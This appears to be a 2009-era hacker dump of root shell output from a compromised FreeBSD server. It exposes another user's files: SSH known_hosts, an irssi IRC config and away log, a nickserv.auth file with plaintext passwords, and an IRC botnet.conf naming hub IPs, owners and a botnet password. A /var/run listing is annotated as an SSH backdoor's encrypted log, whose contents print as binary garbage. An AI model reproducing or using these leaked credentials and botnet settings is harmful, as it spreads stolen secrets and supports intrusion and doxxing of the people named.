-rw-r--r-- 1 romeo romeo 331 Jun 13 07:56 .mailrc
|
||
-rw-r--r-- 1 romeo romeo 797 Jun 13 07:56 .profile
|
||
-rw------- 1 romeo romeo 276 Jun 13 07:56 .rhosts
|
||
-rw-r--r-- 1 romeo romeo 975 Jun 13 07:56 .shrc
|
||
drwx------ 2 romeo romeo 512 Jun 20 02:58 .ssh/
|
||
|
||
[root@velocity:/home/romeo]# cat .ssh/known_hosts
|
||
72.20.6.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYSZga5G62dznPwCooUV5e+kVQ8861IxS3aw3ZkDt9uzLZswbqN4iQmkP7bokLACE7Oz2nIiKkVwcjCF8qqO3lk4pdIJNxg6hTuQcZzPR9IHiK38ajERh2JlPPq1zyCwTvPJK8qTNuwZTcdrlJHrFcZpatepHSTu9hdjb+gF4e1oQNyC20nLtD0w1789tFfJKu/5J5jNEOtj7NyfqEwr3nN2iok4LbdZfK321htZwouCWcC2alEacjuYkcRZylgmxhek5dBqLO+LZTvyuppFTiz8RCmwbVSNK+NVgkj4e4WFcR9CoLh2mfW6o4EfE3d9cxFl9Jk/IHLYPQ/TRbaPVw==
|
||
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
|
||
opteron1.ircvps.com,98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
|
||
quad1.ircvps.com,89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
|
||
67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
|
||
[root@velocity:/home/romeo]#
|
||
|
||
[root@velocity:/home/romeo/.irssi]# ls -la
|
||
total 108
|
||
drwx------ 3 romeo romeo 512 Jun 17 09:42 ./
|
||
drwxr-xr-x 4 romeo romeo 512 Jun 27 21:56 ../
|
||
-rw------- 1 romeo romeo 4500 Jun 28 02:13 away.log
|
||
-rw-r--r-- 1 romeo romeo 9591 Jun 27 22:51 config
|
||
-rw-r----- 1 romeo romeo 584 Jun 17 07:16 config.old
|
||
-rw-r----- 1 romeo romeo 8472 Jun 27 21:56 default.theme
|
||
-rw-r--r-- 1 romeo romeo 8466 Feb 20 16:08 fear2.theme
|
||
-rw------- 1 romeo romeo 70 Jun 17 07:31 nickserv.auth
|
||
-rw-r--r-- 1 romeo romeo 74 Jun 17 07:31 nickserv.networks
|
||
-rw-r--r-- 1 romeo romeo 4667 Jun 27 21:56 pandemonium.theme
|
||
drwxr-xr-x 3 romeo romeo 512 Jun 22 17:50 scripts/
|
||
[root@velocity:~]#
|
||
|
||
[root@velocity:/home/romeo/.irssi]# cat nickserv.auth
|
||
secchat RoMeO ve2aZCp3GYoq
|
||
bhf RoMeO ra7plmyt
|
||
tdirc RoMeO sidfh928rf783
|
||
[root@velocity:~]#
|
||
|
||
[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log
|
||
--- Log opened Tue Jun 30 01:08:25 2009
|
||
01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
|
||
01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
|
||
01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e
|
||
02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
|
||
--- Log closed Tue Jun 30 04:12:51 2009
|
||
--- Log opened Tue Jun 30 19:19:25 2009
|
||
19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
|
||
19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
|
||
19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
|
||
20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
|
||
--- Log closed Tue Jun 30 20:06:56 2009
|
||
--- Log opened Tue Jun 30 21:22:55 2009
|
||
21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
|
||
21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
|
||
21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
|
||
--- Log closed Tue Jun 30 22:17:55 2009
|
||
--- Log opened Wed Jul 01 00:59:13 2009
|
||
--- Log closed Wed Jul 01 01:00:01 2009
|
||
--- Log opened Wed Jul 01 01:00:23 2009
|
||
01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e
|
||
01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
|
||
01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
|
||
01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
|
||
01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
|
||
01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e
|
||
01:34 #bhf: (c+c>/HTHg) ehis response: <RoMeO> when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
|
||
01:34 #bhf: (cc8/Darkg8/:3/Romeog) e
|
||
01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
|
||
01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
|
||
--- Log closed Wed Jul 01 02:43:40 2009
|
||
--- Log opened Wed Jul 01 03:32:17 2009
|
||
--- Log closed Wed Jul 01 03:32:22 2009
|
||
--- Log opened Wed Jul 01 03:32:24 2009
|
||
--- Log closed Wed Jul 01 05:38:09 2009
|
||
--- Log opened Wed Jul 01 06:53:32 2009
|
||
--- Log closed Wed Jul 01 06:53:36 2009
|
||
--- Log opened Wed Jul 01 06:53:44 2009
|
||
07:03 #darkmindz: (c&c>/Xiresg) e<RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
|
||
[root@velocity:/]#
|
||
|
||
|
||
[root@velocity:/home/romeo/.irssi]# cat config
|
||
servers = (
|
||
{ address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
|
||
{ address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
|
||
{
|
||
address = "irc.undernet.org";
|
||
chatnet = "Undernet";
|
||
port = "6667";
|
||
},
|
||
{ address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
|
||
{ address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
|
||
{ address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
|
||
{ address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
|
||
{ address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
|
||
{
|
||
address = "irc.securitychat.org";
|
||
chatnet = "secchat";
|
||
port = "6667";
|
||
autoconnect = "yes";
|
||
nick = "RoMeO";
|
||
},
|
||
{
|
||
address = "irc.blackhat-forums.com";
|
||
chatnet = "bhf";
|
||
port = "6667";
|
||
autoconnect = "yes";
|
||
nick = "RoMeO";
|
||
},
|
||
{
|
||
address = "irc.tdirc.net";
|
||
chatnet = "tdirc";
|
||
port = "6667";
|
||
autoconnect = "yes";
|
||
nick = "RoMeO";
|
||
}
|
||
);
|
||
|
||
chatnets = {
|
||
IRCNet = {
|
||
type = "IRC";
|
||
max_kicks = "4";
|
||
max_modes = "3";
|
||
max_msgs = "5";
|
||
max_whois = "4";
|
||
max_query_chans = "5";
|
||
};
|
||
EFNet = {
|
||
type = "IRC";
|
||
max_kicks = "4";
|
||
max_modes = "4";
|
||
max_msgs = "3";
|
||
};
|
||
Undernet = {
|
||
type = "IRC";
|
||
max_kicks = "4";
|
||
max_modes = "3";
|
||
max_msgs = "3";
|
||
};
|
||
DALNet = {
|
||
type = "IRC";
|
||
max_kicks = "4";
|
||
max_modes = "6";
|
||
max_msgs = "3";
|
||
};
|
||
OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
|
||
GIMPNet = {
|
||
type = "IRC";
|
||
max_kicks = "4";
|
||
max_modes = "4";
|
||
max_msgs = "3";
|
||
};
|
||
PTLink = {
|
||
type = "IRC";
|
||
max_kicks = "1";
|
||
max_modes = "6";
|
||
max_msgs = "100";
|
||
};
|
||
SILC = { type = "SILC"; };
|
||
secchat = { type = "IRC"; };
|
||
bhf = { type = "IRC"; };
|
||
tdirc = { type = "IRC"; };
|
||
};
|
||
|
||
channels = (
|
||
|
||
{ name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
|
||
{ name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
|
||
{ name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
|
||
{ name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
|
||
{ name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
|
||
{ name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
|
||
{ name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
|
||
{ name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
|
||
);
|
||
|
||
aliases = {
|
||
J = "join";
|
||
WJOIN = "join -window";
|
||
WQUERY = "query -window";
|
||
LEAVE = "part";
|
||
BYE = "quit";
|
||
EXIT = "quit";
|
||
SIGNOFF = "quit";
|
||
DESCRIBE = "action";
|
||
DATE = "time";
|
||
HOST = "userhost";
|
||
LAST = "lastlog";
|
||
SAY = "msg *";
|
||
WI = "whois";
|
||
WII = "whois $0 $0";
|
||
WW = "whowas";
|
||
W = "who";
|
||
N = "names";
|
||
M = "msg";
|
||
T = "topic";
|
||
C = "clear";
|
||
CL = "clear";
|
||
K = "kick";
|
||
KB = "kickban";
|
||
KN = "knockout";
|
||
BANS = "ban";
|
||
B = "ban";
|
||
MUB = "unban *";
|
||
UB = "unban";
|
||
IG = "ignore";
|
||
UNIG = "unignore";
|
||
SB = "scrollback";
|
||
UMODE = "mode $N";
|
||
WC = "window close";
|
||
WN = "window new hide";
|
||
SV = "say Irssi $J ($V) - http://irssi.org/";
|
||
GOTO = "sb goto";
|
||
CHAT = "dcc chat";
|
||
RUN = "SCRIPT LOAD";
|
||
SBAR = "STATUSBAR";
|
||
INVITELIST = "mode $C +I";
|
||
};
|
||
|
||
statusbar = {
|
||
# formats:
|
||
# when using {templates}, the template is shown only if its argument isnt
|
||
# empty unless no argument is given. for example {sb} is printed always,
|
||
# but {sb $T} is printed only if $T isnt empty.
|
||
|
||
items = {
|
||
# start/end text in statusbars
|
||
barstart = "{sbstart}";
|
||
barend = "{sbend}";
|
||
|
||
# treated "normally", you could change the time/user name to whatever
|
||
time = "{sb $Z}";
|
||
user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";
|
||
|
||
# treated specially .. window is printed with non-empty windows,
|
||
# window_empty is printed with empty windows
|
||
window = "{sb $winref:$T{sbmode $M}}";
|
||
window_empty = "{sb $winref{sbservertag $tag}}";
|
||
prompt = "{prompt $[.15]T}";
|
||
prompt_empty = "{prompt $winname}";
|
||
topic = " $topic";
|
||
topic_empty = " Irssi v$J - http://irssi.org/help/";
|
||
|
||
# all of these treated specially, theyre only displayed when needed
|
||
lag = "{sb Lag: $0-}";
|
||
act = "{sb Act: $0-}";
|
||
more = "-- more --";
|
||
};
|
||
|
||
# theres two type of statusbars. root statusbars are either at the top
|
||
# of the screen or at the bottom of the screen. window statusbars are at
|
||
# the top/bottom of each split window in screen.
|
||
default = {
|
||
# the "default statusbar" to be displayed at the bottom of the window.
|
||
# contains all the normal items.
|
||
window = {
|
||
disabled = "no";
|
||
|
||
# window, root
|
||
type = "window";
|
||
# top, bottom
|
||
placement = "bottom";
|
||
# number
|
||
position = "1";
|
||
# active, inactive, always
|
||
visible = "active";
|
||
|
||
# list of items in statusbar in the display order
|
||
items = {
|
||
barstart = { priority = "100"; };
|
||
time = { };
|
||
user = { };
|
||
window = { };
|
||
window_empty = { };
|
||
lag = { priority = "-1"; };
|
||
act = { priority = "10"; };
|
||
more = { priority = "-1"; alignment = "right"; };
|
||
barend = { priority = "100"; alignment = "right"; };
|
||
};
|
||
};
|
||
|
||
# statusbar to use in inactive split windows
|
||
window_inact = {
|
||
type = "window";
|
||
placement = "bottom";
|
||
position = "1";
|
||
visible = "inactive";
|
||
items = {
|
||
barstart = { priority = "100"; };
|
||
window = { };
|
||
window_empty = { };
|
||
more = { priority = "-1"; alignment = "right"; };
|
||
barend = { priority = "100"; alignment = "right"; };
|
||
};
|
||
};
|
||
|
||
# we treat input line as yet another statusbar :) Its possible to
|
||
# add other items before or after the input line item.
|
||
prompt = {
|
||
type = "root";
|
||
placement = "bottom";
|
||
# we want to be at the bottom always
|
||
position = "100";
|
||
visible = "always";
|
||
items = {
|
||
prompt = { priority = "-1"; };
|
||
prompt_empty = { priority = "-1"; };
|
||
# treated specially, this is the real input line.
|
||
input = { priority = "10"; };
|
||
};
|
||
};
|
||
|
||
# topicbar
|
||
topic = {
|
||
type = "root";
|
||
placement = "top";
|
||
position = "1";
|
||
visible = "always";
|
||
items = {
|
||
barstart = { priority = "100"; };
|
||
topic = { };
|
||
topic_empty = { };
|
||
barend = { priority = "100"; alignment = "right"; };
|
||
};
|
||
};
|
||
};
|
||
};
|
||
settings = {
|
||
core = {
|
||
real_name = "romeo haxxor"; // "romeo haxxed"
|
||
user_name = "RoMeO";
|
||
nick = "RoMeO";
|
||
|
||
timestamp_format = "%H:%M:%S";
|
||
hostname = "absolute.ownage.net"; // absolutely owned..
|
||
};
|
||
"fe-common/core" = {
|
||
autolog = "no";
|
||
autolog_path = "~/irclogs/$tag/$0-%m%y.log";
|
||
show_nickmode_empty = "yes";
|
||
theme = "pandemonium";
|
||
autocreate_own_query = "no";
|
||
autocreate_query_level = "DCCMSGS";
|
||
use_status_window = "no";
|
||
use_msgs_window = "yes";
|
||
};
|
||
"fe-text" = {
|
||
colors = "yes";
|
||
autostick_split_windows = "yes";
|
||
actlist_sort = "refnum";
|
||
};
|
||
};
|
||
logs = { };
|
||
ignores = ( );
|
||
keyboard = (
|
||
{ key = "meta-1"; id = "change_window"; data = "1"; },
|
||
{ key = "meta-2"; id = "change_window"; data = "2"; },
|
||
{ key = "meta-3"; id = "change_window"; data = "3"; },
|
||
{ key = "meta-4"; id = "change_window"; data = "4"; },
|
||
{ key = "meta-5"; id = "change_window"; data = "5"; },
|
||
{ key = "meta-6"; id = "change_window"; data = "6"; },
|
||
{ key = "meta-7"; id = "change_window"; data = "7"; },
|
||
{ key = "meta-8"; id = "change_window"; data = "8"; },
|
||
{ key = "meta-9"; id = "change_window"; data = "9"; },
|
||
{ key = "meta-0"; id = "change_window"; data = "10"; }
|
||
);
|
||
|
||
hilights = (
|
||
{ text = "RoMeO"; nick = "yes"; word = "yes"; },
|
||
{ text = "darkmindz"; nick = "yes"; word = "yes"; },
|
||
{ text = "antisec"; nick = "yes"; word = "yes"; },
|
||
{ text = "anti-sec"; nick = "yes"; word = "yes"; },
|
||
{ text = "zf0"; nick = "yes"; word = "yes"; },
|
||
{ text = "strayfe"; nick = "yes"; word = "yes"; },
|
||
{ text = "n3w7yp3"; nick = "yes"; word = "yes"; },
|
||
{ text = "copyandpaste"; nick = "yes"; word = "yes"; },
|
||
{ text = "blackhat"; nick = "yes"; word = "yes"; },
|
||
{ text = "whitehat"; nick = "yes"; word = "yes"; },
|
||
{ text = "b0rx"; nick = "yes"; word = "yes"; }
|
||
); // I wonder.. zf0?.. Lulz
|
||
|
||
windows = {
|
||
1 = { };
|
||
2 = {
|
||
immortal = "yes";
|
||
name = "(msgs)";
|
||
level = "MSGS ACTIONS DCCMSGS";
|
||
};
|
||
3 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#bhf";
|
||
tag = "bhf";
|
||
}
|
||
);
|
||
};
|
||
4 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#gso-chat";
|
||
tag = "bhf";
|
||
}
|
||
);
|
||
};
|
||
5 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#r00tsecurity";
|
||
tag = "tdirc";
|
||
}
|
||
);
|
||
};
|
||
6 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#thedefaced";
|
||
tag = "tdirc";
|
||
}
|
||
);
|
||
};
|
||
7 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#zer0zone";
|
||
tag = "tdirc";
|
||
}
|
||
);
|
||
};
|
||
8 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#kinqpinz";
|
||
tag = "secchat";
|
||
}
|
||
);
|
||
};
|
||
9 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#darkmindz";
|
||
tag = "secchat";
|
||
}
|
||
);
|
||
};
|
||
10 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#astalavista";
|
||
tag = "secchat";
|
||
}
|
||
);
|
||
};
|
||
};
|
||
mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };
|
||
|
||
|
||
[root@velocity:/tmp/...]# cat botnet.conf
|
||
set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
|
||
set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
|
||
set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
|
||
set owner "shoes , rizo" ; # owner(s) ("Jmns")
|
||
set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
|
||
set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
|
||
source harry.tcl
|
||
[root@velocity:/tmp/...]#
|
||
|
||
[root@velocity:/]# ls -la
|
||
total 129
|
||
drwxr-xr-x 22 root wheel 512 Jun 29 16:00 ./
|
||
drwxr-xr-x 22 root wheel 512 Jun 29 16:00 ../
|
||
-rw-r--r-- 2 root wheel 801 Jan 12 2007 .cshrc
|
||
drwxr-xr-x 2 root wheel 512 Jun 29 16:00 .dev/
|
||
-rw-r--r-- 2 root wheel 251 Jan 12 2007 .profile
|
||
drwxrwxr-x 2 root operator 512 Apr 12 2007 .snap/
|
||
-r--r--r-- 1 root wheel 6196 Jan 12 2007 COPYRIGHT
|
||
drwxr-xr-x 2 root wheel 1024 Apr 16 2007 bin/
|
||
drwxr-xr-x 6 root wheel 512 Apr 16 2007 boot/
|
||
drwxr-xr-x 2 root wheel 512 Apr 12 2007 cdrom/
|
||
lrwxr-xr-x 1 root wheel 10 Apr 12 2007 compat@ -> usr/compat
|
||
dr-xr-xr-x 4 root wheel 512 Dec 31 1969 dev/
|
||
drwxr-xr-x 2 root wheel 512 Apr 12 2007 dist/
|
||
-rw------- 1 root wheel 4096 Apr 16 2007 entropy
|
||
drwxr-xr-x 19 root wheel 2048 Jun 28 21:09 etc/
|
||
lrwxrwxrwx 1 root wheel 8 Apr 12 2007 home@ -> usr/home
|
||
drwxr-xr-x 2 root wheel 512 Apr 12 2007 home2/
|
||
-rw-r--r-- 1 root wheel 0 Oct 5 2007 jj.log
|
||
lrwxr-xr-x 1 root wheel 22 Apr 15 2007 kernconf@ -> /usr/src/sys/i386/conf
|
||
drwxr-xr-x 3 root wheel 1024 Nov 5 2008 lib/
|
||
drwxr-xr-x 2 root wheel 512 Apr 16 2007 libexec/
|
||
drwxr-xr-x 2 root wheel 512 Jan 12 2007 media/
|
||
drwxr-xr-x 2 root wheel 512 Jan 12 2007 mnt/
|
||
dr-xr-xr-x 2 root wheel 512 Jan 12 2007 proc/
|
||
drwxr-xr-x 2 root wheel 2560 Nov 5 2008 rescue/
|
||
drwxr-xr-x 6 root wheel 512 Jun 29 08:26 root/
|
||
drwxr-xr-x 2 root wheel 2560 Apr 16 2007 sbin/
|
||
lrwxr-xr-x 1 root wheel 11 Apr 16 2007 sys@ -> usr/src/sys
|
||
drwxrwxrwt 103 root wheel 3072 Jun 29 16:00 tmp/
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 07:35 usr/
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 05:05 var/
|
||
|
||
|
||
[root@velocity:/var/run]# ls -la
|
||
total 112
|
||
drwxr-xr-x 5 root wheel 512 Jun 26 21:20 ./
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 05:05 ../
|
||
-rw-r--r-- 1 root wheel 0 Jun 25 11:08 a.out
|
||
-rw------- 1 root wheel 0 Jun 25 15:43 as.core
|
||
-rw------- 1 root wheel 3 Jan 27 2008 cron.pid
|
||
-rw-r--r-- 1 root wheel 4 Jan 27 2008 devd.pid
|
||
srw-rw-rw- 1 root wheel 0 Jan 27 2008 devd.pipe=
|
||
-rw-r--r-- 1 root wheel 5659 Jan 27 2008 dmesg.boot
|
||
-rw------- 1 root wheel 5 Jun 25 08:57 inetd.pid
|
||
-r--r--r-- 1 root wheel 245 Jun 23 23:21 ld-elf.so.hints
|
||
-r--r--r-- 1 root wheel 67 Jan 27 2008 ld.so.hints
|
||
srw-rw-rw- 1 root wheel 0 Jan 27 2008 log=
|
||
srw------- 1 root wheel 0 Jan 27 2008 logpriv=
|
||
drwxr-xr-x 2 bind bind 512 Jan 12 2007 named/
|
||
drwxrwx--- 2 root network 512 Jan 12 2007 ppp/
|
||
drwxr-xr-x 2 root wheel 512 Jan 27 2008 proftpd/
|
||
-rw-r--r-- 1 root wheel 4 Jan 27 2008 proftpd.pid
|
||
-rw-r--r-- 1 root wheel 14776 Jun 26 20:09 proftpd.scoreboard
|
||
-rw------- 1 root wheel 78 Jan 27 2008 sendmail.pid
|
||
-rw-rw-rw- 1 root wheel 2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
|
||
-rw-r--r-- 1 root wheel 6 Jun 17 18:29 sshd.pid
|
||
-rw------- 1 root wheel 3 Jan 27 2008 syslog.pid
|
||
-rw-r--r-- 1 root wheel 0 Jan 27 2008 syslogd.sockets
|
||
-rw-r--r-- 1 root wheel 1496 Jun 26 21:31 utmp
|
||
[root@velocity:/var/run]#
|
||
|
||
[root@velocity:/var/run]# cat ssh.old
|
||
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ<3B><>’š<3B>ŝŠƙ•<3B>˜<3B>�<3B><><EFBFBD>Ɵ<3B>–’<3B>–‘•˜ƎŒŒ˜†ϥ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵœ<3B>Š<3B>“<3B>‰š<3B><>žϵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵœ<3B>Š<3B>“<3B>‰š<3B><>žϵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟŒ’žŒ—őΘˆ—ύš�<3B><><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈П“ž˜ś<3B><><EFBFBD><EFBFBD>–‘Œ—–‹“–”šž‘ž“–š‘�<3B><><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈П“ž˜ś<3B><><EFBFBD><EFBFBD>–‘Œ—–‹“–”šž‘ž“–š‘�<3B><><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈П“ś<3B><><EFBFBD><EFBFBD>–‘Œ—–‹“–”šž‘ž“–š‘�<3B><><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�<3B><><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ<3B>Œ†œ<3B>…ŕš“šŒŠ–Œ�<3B><><EFBFBD>Ɵ<3B>Œ†œ<3B>…ŕš“šŒŠ–Œ�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ”<3B>Šž<3B><>žŞŒ“ŒІΌ�<3B><><EFBFBD>Ɵ<3B>’˜ˆ‹™ő<3B>”–ž…�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ’ž‹‹